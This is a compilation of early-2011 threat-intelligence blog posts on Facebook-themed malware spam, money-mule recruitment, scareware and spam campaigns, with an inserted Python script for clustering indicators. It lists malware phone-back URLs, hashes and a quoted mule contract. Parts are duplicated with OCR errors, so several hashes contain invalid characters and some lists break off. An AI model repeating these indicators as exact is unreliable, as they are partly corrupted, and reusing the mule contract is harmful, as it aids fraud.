Top Ten Must-Read DDanchev Posts For 2010 (2011-01-22 00:25)

01. [1]How the Koobface Gang Monetizes Mac OS X Traffic

02. [2]AS50215 Troyak-as Taken Offline, Zeus C&Cs Drop from 249 to 181

03. [3]The DNS Infrastructure of the Money Mule Recruitment Ecosystem

04. [4]The Avalanche Botnet and the TROYAK-AS Connection

05. [5]Koobface Gang Responds to the "10 Things You Didn't Know About the Koobface Gang Post"

06. [6]Sampling Malicious Activity Inside Cybercrime-Friendly Search Engines

07. [7]GazTransitStroy/GazTranZitStroy: From Scareware to Zeus Crimeware and Client-Side Exploits

08. [8]Dissecting Northwestern Bank's Client-Side Exploits Serving Site Compromise

09. [9]U.S. Treasury Site Compromise Linked to the NetworkSolutions Mass WordPress Blogs Compromise

10. [10]TorrentReactor.net Serving Crimeware, Client-Side Exploits Through a Malicious Ad

This post has been reproduced from [11]Dancho Danchev's blog.


1. http://ddanchev.blogspot.com/2010/02/how-koobface-gang-monetizes-mac-os-x.html

2. http://ddanchev.blogspot.com/2010/03/as50215-troyak-as-taken-offline-zeus-c.html

3. http://ddanchev.blogspot.com/2010/04/dns-infrastructure-of-money-mule.html

4. http://ddanchev.blogspot.com/2010/05/avalanche-botnet-and-troyak-as.html

5. http://ddanchev.blogspot.com/2010/05/koobface-gang-responds-to-10-things-you.html

6. http://ddanchev.blogspot.com/2010/07/sampling-malicious-activity-inside.html

7. http://ddanchev.blogspot.com/2010/03/gaztransitstroygaztranzitstroy-from.html

8. http://ddanchev.blogspot.com/2010/04/dissecting-northwestern-banks-client.html

9. http://ddanchev.blogspot.com/2010/05/us-treasury-site-compromise-linked-to.html

10. http://ddanchev.blogspot.com/2010/05/torrentreactornet-serving-crimeware.html

11. http://ddanchev.blogspot.com/

Top Ten Must-Read Posts at ZDNet's Zero Day for 2010 (2011-01-22 12:06)

01. [1]Seven myths about zero day vulnerabilities debunked

02. [2]Should a targeted country strike back at the cyber attackers?

03. [3]5 reasons why the proposed ID scheme for Internet users is a bad idea

04. [4]Hotmail's new security features vs Gmail's old security features

05. [5]Attack of the Opt-In Botnets

06. [6]From Russia with (objective) spam stats

07. [7]The current state of the crimeware threat - Q&A

08. [8]Mac OS X SMS ransomware - hype or real threat?

09. [9]10 things you didn't know about the Koobface gang

10. [10]Google-China cyber espionage saga - FAQ

This post has been reproduced from [11]Dancho Danchev's blog.

1. http://www.zdnet.com/blog/security/seven-myths-about-zero-day-vulnerabilities-debunked/7026

2. http://www.zdnet.com/blog/security/should-a-targeted-country-strike-back-at-the-cyber-attackers/6194

3. http://www.zdnet.com/blog/security/5-reasons-why-the-proposed-id-scheme-for-internet-users-is-a-bad-idea/6527

4. http://www.zdnet.com/blog/security/hotmails-new-security-features-vs-gmails-old-security-features/6509

5. http://www.zdnet.com/blog/security/attack-of-the-opt-in-botnets/6268

6. http://www.zdnet.com/blog/security/from-russia-with-objective-spam-stats/5813

7. http://www.zdnet.com/blog/security/the-current-state-of-the-crimeware-threat-q-a/5797

8. http://www.zdnet.com/blog/security/mac-os-x-sms-ransomware-hype-or-real-threat/5731

9. http://www.zdnet.com/blog/security/10-things-you-didnt-know-about-the-koobface-gang/5452

10. http://www.zdnet.com/blog/security/google-china-cyber-espionage-saga-faq/5259

11. http://ddanchev.blogspot.com/

Spamvertised "Your password has been stolen!" Malware Campaign Circulating (2011-01-26 20:30)

A currently ongoing spamvertised campaign attempts to impersonate the most popular social networking site, Facebook.

Using a well-proven "Your password has been stolen!" theme, the campaign entices the end user into downloading and executing the malware. Social engineering-driven campaigns targeting Facebook remain among the most popular malware-spreading techniques due to their ease of execution.

Subject: Facebook Support. Your password has been stolen! ID50888

Message: Good afternoon.

A Spam is sent from your FaceBook account.

Your password has been changed for safety. Information regarding your account and a new password is attached to the letter. Read this information thoroughly and change the password to complicated one. Please do not reply to this email, it's automatic mail notification! Thank you for your attention. Your Facebook!

Spamvertised filename: Facebook_details_ID76803.zip (32,458 bytes)

Detection rate:

Facebook_details.exe - [1]Trojan-Downloader:W32/Koobface.HV - 12/43 (27.9%)

MD5: f0e7a8c264fel4562ca8ac98abb35840
SHA1: f68dl5e66590c69ac75c46a09ae495be8bbf231f
SHA256: 3ca757bfdecbee20ecl0d5af770700041f4bclbl7ee3123f4d85acfdl9elbb74

Upon execution, the sample phones back to:

interviewbuy.ru /forum/document.doc
interviewbuy.ru /forum/load.php?file=0
interviewbuy.ru /forum/load.php?file = l
interviewbuy.ru /forum/load.php?file = 2
interviewbuy.ru /forum/load.php?file=3
interviewbuy.ru /forum/load.php?file=4
interviewbuy.ru /forum/load.php?file = 5
interviewbuy.ru /forum/load.php?file=6
interviewbuy.ru /forum/load.php?file=7
interviewbuy.ru /forum/load.php?file=8
interviewbuy.ru /forum/load.php?file=9
interviewbuy.ru /forum/load.php?file=ftpgrabber
interviewbuy.ru /forum/load.php?file = pokergrabber



interviewbuy.ru - 91.204.48.96 (AS24965); 124.217.248.229 (AS45839) - Email: servmanl976@yandex.ru

ZeuS crimeware activity at [2]AS24965 (SPOINT-AS S.Point LTD), as well as [3]SpyEye malicious activity, is also observed there.

This post has been reproduced from [4]Dancho Danchev's blog.

1. http://www.virustotal.com/file-scan/report.html?id=3ca757bfdecbee20ecl0d5af770700041f4bclbl7ee3123f4d85acfd!9elbb74-1296061852

2. https://zeustracker.abuse.ch/monitor.php?as=24965

3. https://spyeyetracker.abuse.ch/monitor.php?as=24965

4. http://ddanchev.blogspot.com/

Keeping Money Mule Recruiters on a Short Leash - Part Five (2011-01-31 12:58)

With money mule recruitment continuing to represent the most actively used risk-forwarding tactic within the cybercrime ecosystem for the purpose of securely distributing fraudulently obtained funds, part five of the "[1]Keeping Money Mule Recruiters on a Short Leash" series is here to stay.

What's particularly interesting about the money mule recruitment domain portfolio that I'll expose is the logical progression from bogus companies offering financial services to a diverse set of companies occupying multiple markets/covering different market segments.

- Current trends - Localization and standardization/template-tization

A great example of this trend - largely driven by the [2]standardization and template-zation of money mule recruitment sites as a service - is Schwartz & Brothers LLC (schwartz-brothers.cc).

"Schwartz & Brothers LLC is the first choice for artists and buyers alike! Schwartz & Brothers LLC is an effective tool for the artist and emerging artist to market and promote their art in a professional and inexpensive manner.

We will market your art to the international community of art buyers. Whether you are looking to buy or sell original art, Schwartz & Brothers LLC is the premier art site for those seeking to buy or sell original art online."

From financial services to an entirely new market segment, whereas the entire recruitment process remains pretty static, excluding several quality-assurance-oriented details. For instance, every potential mule is required to download an entry-level job psychological test, which surprisingly asks directly whether the mule is from Australia, next to automatically choosing Australia as a country of origin at a later stage throughout the registration process.

Moreover, in the context of quality assurance, the recruiters also ask the applicant "Are you/were you convicted?" in an attempt to combine the survey results with other details such as the opening date of the bank account, as well as the average daily/weekly/monthly amount transferred.

- The Terms of Service

"DUTIES:

The Contractor undertakes the responsibility to receive payments from the Clients of the Company to his personal bank account, withdraw cash and to process payments to the Company's partners by Western Union or MoneyGram money transfer system within one (1) day. He/she will report directly to the senior manager and to any other party designated by the senior manager in connection with the performance of the duties under this Agreement and shall fulfill any other duties reasonably requested by the Company and agreed to by the Contractor.


CONFIDENTIALITY:

The Contractor acknowledges that during the engagement he will have access to and become acquainted with various trade secrets, inventions, innovations, processes, information, records and specifications owned or licensed by the Company and/or used by the Company in connection with the operation of its business including, without limitation, the Company's business and product processes, methods, customer lists, accounts and procedures.

The Contractor agrees that he will not disclose any of the aforesaid, directly or indirectly, or use any of them in any manner, either during the term of this Agreement or at any time thereafter. All files, records, documents, blueprints, specifications, information, letters, notes, media lists, original artwork/creative, notebooks, and similar items relating to the business of the Company, whether prepared by the Contractor or otherwise coming into his possession, shall remain the exclusive property of the Company. The Contractor shall not retain any copies of the foregoing without the Company's prior written permission.

The Contractor further agrees that he will not disclose his retention as an independent contractor or the terms of this Agreement to any person without the prior written consent of the Company and shall at all times preserve the confidential nature of his relationship to the Company and of the services hereunder.

If the Contractor releases any of the above information to any parties outside of this company, such as personal friend, close relatives or other Financial Institutions such as a Bank or other Financial Firms, such could be considered grounds for immediate termination. If the Contractor is ever in doubt of what information can be released and when, the Contractor will contact their superior right away.

TERMS OF ENGAGEMENT:

The Contractor is engaged by the Company on terms of thirty-days (30) probationary period. During the probationary period the Company undertakes to pay to the Contractor the base salary amounting to AUD 2300 per month plus 8 % commission from each payment processing operation. After the probationary period the Company agrees to revise and raise the base salary to 3000 USD. The Company has the right to cancel this Agreement at any time within the probationary period or refuse to extend it after that, should the Contractor refuse to fulfill his/her obligations under this Agreement or fulfills them not in good faith. The Contractor has the right to terminate the Agreement at any time on condition that he/she has processed all previous payments and has no new instructions.



COMPENSATION:

The Company undertakes to pay taxes accrued in connection with money transfer. The Company shall also reimburse part of expenses which are incurred in connection with money transfer by Western Union or MoneyGram systems (should money transfer charges exceed 3 %, i.e. commission for payment processing operation). The above difference will be automatically added to the base salary of the Contractor and paid once per month together with the base salary.

The Company shall have the right to decrease the Contractor's commission in case the payment processing terms were violated by the Contractor. Should the Contractor delay re-sending money accepted to his bank account for the period exceeding one (1) day without any explicit reason, the Company shall have the right to impose sanctions on the Contractor if only the delay has not been caused by Force Majeure circumstances and to apply to the arbitration and claim for the reimbursement of the amount transferred to his account or for compensation for other damage, if any, evicted due to the delay.

The Contractor may take days off at any time and at his/her option upon giving five (5) working days advance notice in writing or three (3) working days advance notice via e-mail or fax to the Company in order that the latter may abstain from charging the Contractor with new instructions. However, salary for each day-off is deducted from the Contractor's base salary."

- OSINT data for money mule recruitment sites

The following portfolio of money mule recruitment domains appears to have been registered using automated email registration tools, with the potential for [3]CAPTCHA outsourcing clearly considered by the malicious parties, taking into consideration the ever-decreasing price for solving CAPTCHA challenges.

Name servers of notice: 


ASs of notice using the standard ns1;ns2;ns3 structure:

AS28753 - NETDIRECTAS NETDIRECT Frankfurt, DE

AS19318 - NJIIX-1 NJIIX.net HOB Meadowlands Pkwy Secaucus, NJ 07094 +1.201.605.1425

AS28753 - NETDIRECTAS NETDIRECT Frankfurt, DE

AS15149 - EZZI-101-BGP EZZI
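The pivoting this OSINT section relies on (linking domains and name servers that reuse the same registrant mailbox or sit in the same AS) can be automated. The following is an added example, not code from the original post: it parses lines in the "DOMAIN - IP (ASnnnn) - Email: mailbox@provider" format used above and clusters them; the sample lines are constructed (RFC 5737 addresses, private-use ASNs, example mailboxes), not the post's indicators.

```python
import re
from collections import defaultdict

# One indicator line in the format used in the post: the IP/AS part is optional.
LINE_RE = re.compile(
    r"^\s*(?P<domain>[A-Za-z0-9.-]+)\s*-\s*"
    r"(?:(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s*\((?P<asn>AS\d+)\)\s*-\s*)?"
    r"Email:?\s*(?P<email>\S+@\S+)\s*$"
)

# Constructed sample data (documentation IP ranges, private-use ASNs,
# example mailboxes) - NOT the indicators from the original post.
SAMPLE = """
EXAMPLE-GROUPLLC.CC - Email: urge@mailer-a.example
EXAMPLEGROUP-LLC.CO - Email: urge@mailer-a.example
ACME-FINANCE.CC - 192.0.2.10 (AS64496) - Email: rook@mailer-b.example
ACME-FINANCE-INC.CO - Email: ira@mailer-b.example
NS1.FAKEDNS.CC - 198.51.100.7 (AS64496) - Email: rook@mailer-b.example
NS2.FAKEDNS.CC - 198.51.100.8 (AS64496) - Email: freer@mailer-c.example
NS1.OTHERDNS.CC - 203.0.113.5 (AS64497) - Email: bart@mailer-c.example
this line is not an indicator and is skipped
"""


def parse_indicators(text):
    """Parse indicator lines; lines that do not match the format are skipped."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        rec = m.groupdict()  # unmatched optional groups come back as None
        rec["domain"] = rec["domain"].lower()
        rec["email"] = rec["email"].lower()
        records.append(rec)
    return records


def pivot(records, field):
    """Group domain names by a shared field value ('email', 'asn' or 'ip')."""
    groups = defaultdict(set)
    for r in records:
        if r.get(field):
            groups[r[field]].add(r["domain"])
    return {k: sorted(v) for k, v in groups.items()}


def provider_counts(records):
    """Number of domains registered through each mailbox provider: heavy reuse of
    a handful of free providers is the signature of automated registration."""
    counts = defaultdict(int)
    for r in records:
        counts[r["email"].split("@", 1)[1]] += 1
    return dict(counts)


def clusters(records):
    """Union-find over domains: two domains are linked when they share a
    registrant email or sit in the same AS.  Returns clusters, largest first."""
    parent = {r["domain"]: r["domain"] for r in records}

    def find(x):
        while parent[x] != x:
            parent[x] = parent[parent[x]]  # path halving
            x = parent[x]
        return x

    def union(a, b):
        parent[find(a)] = find(b)

    for field in ("email", "asn"):
        for members in pivot(records, field).values():
            for other in members[1:]:
                union(members[0], other)

    groups = defaultdict(list)
    for d in parent:
        groups[find(d)].append(d)
    return sorted((sorted(g) for g in groups.values()),
                  key=lambda g: (-len(g), g[0]))


if __name__ == "__main__":
    recs = parse_indicators(SAMPLE)
    for c in clusters(recs):
        print(len(c), c)
    print(provider_counts(recs))
```

Singletons in the output are domains the two pivots cannot tie to anything else; adding a pivot on the name servers a domain delegates to (not present in the line format above) is the next step an analyst would take.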

- Long term trends - "from mule inventory to transactions inventory"

With the [4]localization and standardization/template-tization of the entire money mule recruitment process an everyday reality, quality assurance and diversification of the markets/market segments in order to increase the probability of a successful social engineering attack will start taking place. Moreover, the current template-driven recruitment ecosystem will inevitably start taking advantage of basic concepts such as geolocation and content cloaking, in order to once again increase the probability of converting a web site visitor into a mule.

At an invite-only conference that I attended in September 2010, someone from the audience asked me a rather interesting question: does it really matter how many mules are recruited by a particular syndicate, and most importantly, can we talk about an average number of days/weeks/hours by the time the mule gets busted and can no longer offer his/her services?

In the long term, we're inevitably going to witness the migration from building inventories of mules to a transaction-driven mule recruitment model where the capability-driven mentality surpasses the mule inventory building one.

The number of possible transactions with success rates based on historical performance, combined with an infinite loop of recruitment, is what will drive the entire mule recruitment ecosystem.

Related posts:

[5] The DNS Infrastructure of the Money Mule Recruitment Ecosystem

[6] Keeping Money Mule Recruiters on a Short Leash - Part Four

[7] Money Mule Recruitment Campaign Serving Client-Side Exploits

[8] Keeping Money Mule Recruiters on a Short Leash - Part Three

[9] Money Mule Recruiters on Yahoo!'s Web Hosting

[10] Dissecting an Ongoing Money Mule Recruitment Campaign

[11] Keeping Money Mule Recruiters on a Short Leash - Part Two

[12] Keeping Reshipping Mule Recruiters on a Short Leash

[13] Keeping Money Mule Recruiters on a Short Leash

[14] Standardizing the Money Mule Recruitment Process

[15] Inside a Money Laundering Group's Spamming Operations

[16] Money Mule Recruiters use ASProx's Fast Fluxing Services

[17] Money Mules Syndicate Actively Recruiting Since 2002

This post has been reproduced from [18]Dancho Danchev's blog.

1. http://ddanchev.blogspot.com/2010/04/keeping-money-mule-recruiters-on-short.html

2. http://ddanchev.blogspot.com/2009/10/standardizing-money-mule-recruitment.html

3. http://www.zdnet.com/blog/security/inside-indias-captcha-solving-economy/1835

4. http://ddanchev.blogspot.com/2009/10/standardizing-money-mule-recruitment.html

5. http://ddanchev.blogspot.com/2010/04/dns-infrastructure-of-money-mule.html

6. http://ddanchev.blogspot.com/2010/04/keeping-money-mule-recruiters-on-short.html

14. http://ddanchev.blogspot.com/2009/10/standardizing-money-mule-recruitment.html

15. http://ddanchev.blogspot.com/2009/05/inside-money-laundering-groups-spamming.html

16. http://ddanchev.blogspot.com/2008/07/money-mule-recruiters-use-asproxs-fast.html

17. http://ddanchev.blogspot.com/2008/10/money-mules-
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Keeping Money Mule Recruiters on a Short Leash - 
Part Five (2011-01-31 12:58) 

With money mule recruitment continuing to represent the 
most actively used risk-forwarding tactic within the cyber¬ 
crime ecosystem for the purpose of securely distribution 
fraudulently obtained funds, part five of the " [l]Keeping 
Money Mule Recruiters on a Short Leash" series are 
here to stay. 

What's particularly interesting about the money mule 
recruitment domain portfolio that I'll expose, is the logi¬ 
cal progression from bogus companies offering financial 
services, to a diverse set of companies occupying multiple 

markets/covering different market segments. 

- Current trends - Localization and 
standardization/template-tization 

A great example of this trend - largely driven by the 

[2]standardization and template-zation of money 
mule 

recruitment sites as a service- is Schwartz & Brothers 
LLC (schwartz-brothers.cc). 

" Schwartz & Brothers LLC is the first choice for artists and 
buyers alike! Schwartz & Brothers LLC is an effective tool 
for the artist and emerging artist to market and promote 
their art in a professional and inexpensive manner. 


We will market your art to the international community of 
art buyers. Whether you are looking to buy or sell original 
art, Schwartz & Brothers LLC is the premier art site for those 
seeking to buy or sell original art online. " 
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From financial services to an entirely new market segment, 
whereas the entire recruitment process remains pretty 

static, excluding several time quality assurance oriented 
details. For instance, every potential mule is required to 

download a entry level job psychological test, which 
surprisingly asks directly whether the mule is from Australia, 

next to automatically choosing Australia as a country of 
origin at a later stage throughout the registration process. 

Moreover, in the context of quality assurance, the recruiters 
also ask the applicant" Are you/were you con¬ 
victed? " in an attempt to combine the survey results with 
other details such the opening date of the bank account, as 
well as the average daily/weekly/monthly amount 
transferred. 

- The Terms of Service 
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DUTIES: 


The Contractor undertakes the responsibility to receive 
payments from the Clients of the Company to his personal 

bank account, withdraw cash and to process payments to 
the Company's partners by Western Union or MoneyGram 

money transfer system within one (1) day He/she will report 
directly to the senior manager and to any other party 
designated by the senior manager in connection with the 
performance of the duties under this Agreement and shall 

fulfill any other duties reasonably requested by the 
Company and agreed to by the Contractor. 

CONFIDENTIALITY: 

The Contractor acknowledges that during the engagement 
he will have access to and become acquainted with 

various trade secrets, inventions, innovations, processes, 
information, records and specifications owned or li¬ 
censed by the Company and/or used by the Company in 
connection with the operation of its business including, 

without limitation, the Company's business and product 
processes, methods, customer lists, accounts and 
procedures. 

The Contractor agrees that he will not disclose any of the 
aforesaid, directly or indirectly, or use any of them 

in any manner, either during the term of this Agreement or 
at any time thereafter. All files, records, documents, 
blueprints, specifications, information, letters, notes, media 
lists, original artwork/creative, notebooks, and similar items 



relating to the business of the Company, whether prepared 
by the Contractor or otherwise coming into his 

possession, shall remain the exclusive property of the 
Company 
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The Contractor shall not retain any copies of the foregoing 
without the Company's prior written permission. 

The Contractor further agrees that he will not disclose his 
retention as an independent contractor or the terms of this 
Agreement to any person without the prior written consent 
of the Company and shall at all times preserve the 
confidential nature of his relationship to the Company and 
of the services hereunder. 

If the Contractor releases any of the above information to 
any parties outside of this company, such as per¬ 
sonal friend, close relatives or other Financial Institutions 
such as a Bank or other Financial Firms, such could be 
considered grounds for immediate termination. If the 
Contractor is ever in doubt of what information can be 
released and when, the Contractor will contact their 
superior right away. 

TERMS OF ENGAGEMENT: 

The Contractor is engaged by the Company on terms of 
thirty-days (30) probationary period. During the 
probationary 

period the Company undertakes to pay to the 
Contractor the base salary amounting to AUD 2300 
per month 



plus 8 % commission from each payment processing 
operation. After the probationary period the 
Company 

agrees to revise and raise the base salary to 3000 
USD. The Company has the right to cancel this Agreement 
at any time within the probationary period or refuse to 
extend it after that, should the Contractor refuse to fulfill 
his/her obligations under this Agreement or fulfills them not 
in good faith. The Contractor has the right to terminate the 
Agreement at any time on condition that he/she has 
processed all previous payments and has no new 
instructions. 

COMPENSATION: 

The Company undertakes to pay taxes accrued in 
connection with money transfer. The Company shall also 
reimburse 

part of expenses which are incurred in connection with 
money transfer by Western Union or MoneyGram systems 

(should money transfer charges exceed 3 %, i.e. 
commission for payment processing operation). The above 
difference will be automatically added to the base salary of 
the Contractor and paid once per month together with the 
base salary. 

The Company shall have the right to decrease the 
Contractor's commission in case the payment processing 

terms were violated by the Contractor. Should the 
Contractor delays re-sending money accepted to his bank 
account for the period exceeding one (1) day without any 
explicit reason, the Company shall have the right to impose 
sanctions on the Contractor if only the delay has not been 



caused by the Force Majeur circumstances and to apply to 
the 

arbitration and claim for the reimburse of the amount 
transferred to his account or for compensation for other 

damage if any, evicted due to the delay. 

The Contractor may take days off at any time and at his/her 
option upon giving five (5) working days advance 

notice in writing or three (3) working days advance notice 
via e-mail or fax to the Company in order that the latter 
may abstain from charging the Contractor with new 
instructions. However, salary for each day-off is deducted 
from the Contractor's base salary. " 

- OSINT data for money mule recruitment sites 

The following portfolio of money mule recruitment domains 
appears to have been registered using automated email 

registration tools, with the potential for [3]CAPTCHA 
outsourcing clearly considered by the malicious parties, 
taking into consideration the even decreasing price for 
solving CAPTCHA challenges. 

Name servers of notice: 


ASs of notice using the standard ns1; ns2; ns3 structure: 

AS28753 - NETDIRECTAS NETDIRECT Frankfurt, DE 

AS19318 - NJIIX-1 NJIIX.net HOB Meadowlands Pkwy Secaucus, NJ 07094 +1.201.605.1425 

AS15149 - EZZI-101-BGP EZZI 

- Long term trends - "from mule inventory to transactions inventory" 

With the [4]localization and standardization/templatization of the entire money mule recruitment process now an everyday reality, quality assurance and diversification of the markets/market segments, aimed at increasing the probability of a successful social engineering attack, will start taking place. Moreover, the current template-driven recruitment ecosystem will inevitably start taking advantage of basic concepts such as geolocation and content cloaking, in order to once again increase the probability of converting a web site visitor into a mule. 

At an invite-only conference that I attended in September 2010, someone from the audience asked me a rather interesting question. Does it really matter how many mules are recruited by a particular syndicate, and most importantly, can we talk about an average number of days/weeks/hours by the time the mule gets busted, and can no longer offer his/her services? 

In the long term, we're inevitably going to witness the migration from building inventories of mules to a transaction-driven mule recruitment model, where the capability-driven mentality surpasses the mule-inventory-building one. 

The number of possible transactions, with success rates based on historical performance, combined with an infinite loop of recruitment, is what will drive the entire mule recruitment ecosystem. 

Related posts: 

[5] The DNS Infrastructure of the Money Mule Recruitment Ecosystem 

[6] Keeping Money Mule Recruiters on a Short Leash - Part Four 

[7] Money Mule Recruitment Campaign Serving Client-Side Exploits 

[8] Keeping Money Mule Recruiters on a Short Leash - Part Three 

[9] Money Mule Recruiters on Yahoo!'s Web Hosting 

[10] Dissecting an Ongoing Money Mule Recruitment Campaign 

[11] Keeping Money Mule Recruiters on a Short Leash - Part Two 

[12] Keeping Reshipping Mule Recruiters on a Short Leash 

[13] Keeping Money Mule Recruiters on a Short Leash 

[14] Standardizing the Money Mule Recruitment Process 

[15] Inside a Money Laundering Group's Spamming Operations 

[16] Money Mule Recruiters use ASProx's Fast Fluxing Services 

[17] Money Mules Syndicate Actively Recruiting Since 2002 

This post has been reproduced from [18]Dancho Danchev's 
blog. 
6. http://ddanchev.blogspot.com/2010/04/keeping-money- 

7. http://ddanchev.blogspot.com/2010/03/money-mule- 

8. http://ddanchev.blogspot.com/2010/03/keeping-money-mule-recruiters-on-short.html 

9. http://ddanchev.blogspot.com/2010/03/money-mule-recruiters-on-yahoos-web.html 

10. http://ddanchev.blogspot.com/2010/02/dissecting- 

14. http://ddanchev.blogspot.com/2009/10/standardizing- 
February (2011-02-09 12:43) 

Whatever the cybercrime marketplace demands, the 
cybercrime marketplace supplies. 
Spamvertised Portfolio of Fraudulent/Pharmaceutical Domains (2011-02-14 20:14) 

Just in time for Saint Valentine's Day, pharmaceutical scammers have switched their localized templates to a more romantic theme. 

The domains have been registered using three separate Yahoo! Mail accounts, and are all responding to a single IP - 115.239.229.196; AS4134, CHINA-TELECOM China Telecom, with four currently active [1]ZeuS C&Cs within the same AS - aiyanxinxi.com; wawnet.net; www.zuihouyi.com; nascetur.com. 

See also: 

• [2]Inside an affiliate spam program for pharmaceuticals 

• [3]Survey: Millions of users open spam emails, click on links 

• [4]Microsoft's Bing invaded by pharmaceutical scammers 







Name servers of notice, responding to 115.239.229.196 (AS4134); 113.23.142.119 (AS38182) and 78.46.105.205 (AS24940 - active [5]SpyEye C&Cs at www.privathosting.eu; spl.privathosting.eu): 


This post has been reproduced from [6]Dancho Danchev's blog. 

1. https://zeustracker.abuse.ch/monitor.php?as=4134 

2. http://www.zdnet.com/blog/security/inside-an-affiliate-spam-program-for-pharmaceuticals/2054 

3. http://www.zdnet.com/blog/security/survey-millions-of-users-open-spam-emails-click-on-links/5889 

4. http://www.zdnet.com/blog/security/microsofts-bing-invaded-by-pharmaceutical-scammers/3993 

5. https://spyeyetracker.abuse.ch/monitor.php?as=24940 

6. http://ddanchev.blogspot.com/ 
A Diverse Portfolio of Fake Security Software - Part Twenty Five (2011-02-15 16:06) 

Scareware continues occupying the top spots for malicious monetization tactics courtesy of the cybercrime ecosystem. Disruption of this monetization chain can take place through multiple processes. For instance: 

• Share data with the affected ISP whose customers participate in the black hat SEO campaign 

• Target the payment processing gateways, or inform the legitimate one 

• Target the redirector URLs of the campaign 

• Target the affiliate network itself 

• Target the "final output" in the form of scareware domains 

In this post we'll expose a portfolio of scareware domains, and will target the "final output" of the campaign, in between sharing data with community members. As always, what originally looks like a low profile campaign turns into a piece of the puzzle from the massive blackhat SEO "picture". 







- Detection rate for systemwrecksavertingsystem.com/scan1/92/freesystemscan.exe 

[1] freesystemscan.exe - Trojan.Win32.FakeAV 
Result: 17/43 (39.5 %) 
MD5: a69a7f1992ed4607ac0a163d66984f56 
SHA1: ef089f92881ff6835b76562febdcbc3328340adb 
SHA256: 993026853e2bbc8846dbda5a90c4f06a9a18b83c9f97fe7b1557b03975ebeaff 

- Detection rate for pornhugevideo.com/video3/88/freevideoplugin.exe 

[2] freevideoplugin.exe - Rogue:Win32/FakePAV 
Result: 4/42 (9.5 %) 
MD5: 8a688d6ebb838f66f16720f4066cf6c6 
SHA1: 845e43ad946048346b3d9150ae41fd8f7766ac53 
SHA256: db6e3e7a72305d8b36861ed90753555d519bdca5a36aa0581ed363ac264cfbce 

Responding to 94.23.105.248 (AS16276): One active [3]ZeuS C&C within the AS - monasteriodeboltana.es 


Responding to 76.76.117.101 (AS21793); 78.46.105.205 (AS24940); 207.58.177.96 (AS25847) and 64.64.3.125 (AS25847): 


This post has been reproduced from [4]Dancho Danchev's 
blog. 

Related posts on scareware and blackhat SEO monetization: 

[5] A Diverse Portfolio of Scareware/Blackhat SEO Redirectors Courtesy of the Koobface Gang 

[6] Dissecting a Scareware-Serving Black Hat SEO Campaign Using Compromised .NL/.CH Sites 

[7] Dissecting the 100,000+ Scareware Serving Fake YouTube Pages Campaign 

[8] Dissecting the Ongoing U.S Federal Forms Themed Blackhat SEO Campaign - Part Two 

[9] Blackhat SEO Campaign Hijacks U.S Federal Form Keywords, Serves Scareware 

[10] U.S Federal Forms Blackhat SEO Themed Scareware Campaign Expanding 

[11] Dissecting the Ongoing U.S Federal Forms Themed Blackhat SEO Campaign 

[12] The ultimate guide to scareware protection 

[13] A Diverse Portfolio of Scareware/Blackhat SEO Redirectors Courtesy of the Koobface Gang 

[14] Massive Scareware Serving Blackhat SEO, the Koobface Gang Style 

[15] A Peek Inside the Managed Blackhat SEO Ecosystem 

[16] Dissecting a Swine Flu Black SEO Campaign 

[17] Massive Blackhat SEO Campaign Serving Scareware 

[18] From Ukrainian Blackhat SEO Gang With Love 

[19] From Ukrainian Blackhat SEO Gang With Love - Part Two 

[20] From Ukraine with Scareware Serving Tweets, Bogus LinkedIn/Scribd Accounts, and Blackhat SEO Farms 

[21] From Ukraine with Bogus Twitter, LinkedIn and Scribd Accounts 

[22] Fake Web Hosting Provider - Front-end to Scareware Blackhat SEO Campaign at Blogspot 

[23] The Ultimate Guide to Scareware Protection 

[24] A Diverse Portfolio of Fake Security Software - Part 

[25] A Diverse Portfolio of Fake Security Software - Part 
Bogus Adult Content SPIM-ed Over ICQ (2011-02-16 13:25) 

A currently SPIM-ed campaign over ICQ attempts to trick the end user into becoming a member of a bogus adult content offering network, which drives sales through spamming. 

The links chain: 

- ow.ly/3V9eu 

- art-spectrum.info/load2/7674/foto.jar - 178.170.250.12 (AS52000, ALDAN-3-AS LTD "ALDAN-3") 

- video-girl.tv/default.aspx - 81.177.3.250 - Email: support@video-people.com (AS8342, RTCOMM-AS OJSC RT-Comm.RU) with two active [1]SpyEye C&Cs within the AS - googlemaps4.com (81.176.236.177) and reg.kygalu.ru (81.177.32.45) - Email: kygalu.ru@r01-service.ru 

- Responding to 178.170.250.12 are also geoinvest.org (178.170.250.12) - Email: geoinvest@sum.co.ru and powerman.ru (178.170.250.12) - Email: antonvp@yandex.ru 

- Responding to 81.177.3.250 are: 

This post has been reproduced from [2]Dancho Danchev's 
blog. 

1. https://spyeyetracker.abuse.ch/monitor.php?as=8342 

2. http://ddanchev.blogspot.com/ 
Sampling 419 Advance Fee Scams Activity - Part Two (2011-02-21 13:54) 

Part two of the [1]Sampling 419 Advance Fee Scams Activity series once again aims to provide actionable real-time threat intelligence on a fraudulent segment that continues tricking hundreds of thousands of average Internet users into thinking that they have pending payments, have won the lottery, or that someone is basically interested in doing multi-million dollar business with them. 

The format of the data obtained over the past 24 hours is return email plus the original IP of the sender, most of which can be geolocated to African countries. 
See also: 

• [2]419 scammers using Dilbert.com 

• [3]419 scammers using NYTimes.com 'email this' feature 

• [4]Protection tips for the upcoming FIFA World Cup themed cybercrime campaigns 



Historical OSINT remains an inseparable part of the CYBERINT gathering practices, hence the continuation of the Sampling 419 Advance Fee Scams Activity series. 

This post has been reproduced from [5]Dancho Danchev's blog. Follow him [6]on Twitter. 

1. http://ddanchev.blogspot.com/2010/06/sampling-419-advance-fee-scams-activity.html 

2. http://www.zdnet.com/blog/security/419-scammers-using-dilbertcom/3809 

3. http://www.zdnet.com/blog/security/419-scammers-using-nytimescom-email-this-feature/3491 

4. http://www.zdnet.com/blog/security/protection-tips-for-the-upcoming-fifa-world-cup-themed-cybercrime-campaigns/6610 

5. http://ddanchev.blogspot.com/ 

6. http://twitter.com/danchodanchev 
Summarizing Zero Day's Posts for February (2011-02-28 15:59) 

[1] 

The following is a brief summary of all of my posts at ZDNet's Zero Day for February. You can subscribe to my [2]personal RSS feed, [3]Zero Day's main feed, or follow me on Twitter: [4] 

Recommended reading: 

• [5]500,000 stolen email passwords discovered in 
Waledac's cache 

• [6]Report: AV users still get infected with malware 

• [7]Report: Patched vulnerabilities remain prime 
exploitation vector 

01. [8]Researcher demos SMS-based smartphone botnet 

02. [9]500,000 stolen email passwords discovered in 
Waledac's cache 

03. [10]Study: US tops ZeuS hosting infrastructure chart 

